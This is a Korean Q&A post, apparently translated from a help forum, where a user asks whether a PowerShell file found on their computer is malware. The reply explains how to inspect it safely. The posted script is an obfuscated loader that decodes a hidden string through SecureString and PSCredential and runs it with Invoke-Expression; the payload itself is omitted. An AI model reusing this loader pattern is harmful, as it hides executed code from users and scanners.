의심스러운 콘텐츠가 포함된 알 수 없는 PowerShell 스크립트: 맬웨어?

의심스러운 콘텐츠가 포함된 알 수 없는 PowerShell 스크립트: 맬웨어?

5cfdf61c454c1fc5e9f0fcad2d12d5ef.ps1내 컴퓨터에서 다음과 같은 스크립트를 찾았습니다 .

$pyfwthc = # this is just a TON of random letters and numbers didnt wanna waste the space and its probably not important (encrypted maybe?)
$sstring = ConvertTo-SecureString $pyfwthc
$script = (New-Object system.Management.Automation.PSCredential("pyfwthc", $sstring)).GetNetworkCredential().Password
Invoke-Expression $script

이것이 내가 걱정해야 할 일입니까?

답변1

그것을 분석해 봅시다.

업데이트: 다른 사용자가 지적했듯이 암호 문자열을 명령으로 실행하고 있습니다. $script의 값을 파일에 덤프하여 실행 중인 내용을 확인하려고 합니다.

스크립트에서 마지막 줄을 제거하고 다음을 실행합니다.

echo $script > this_is_the_script.file

관련 정보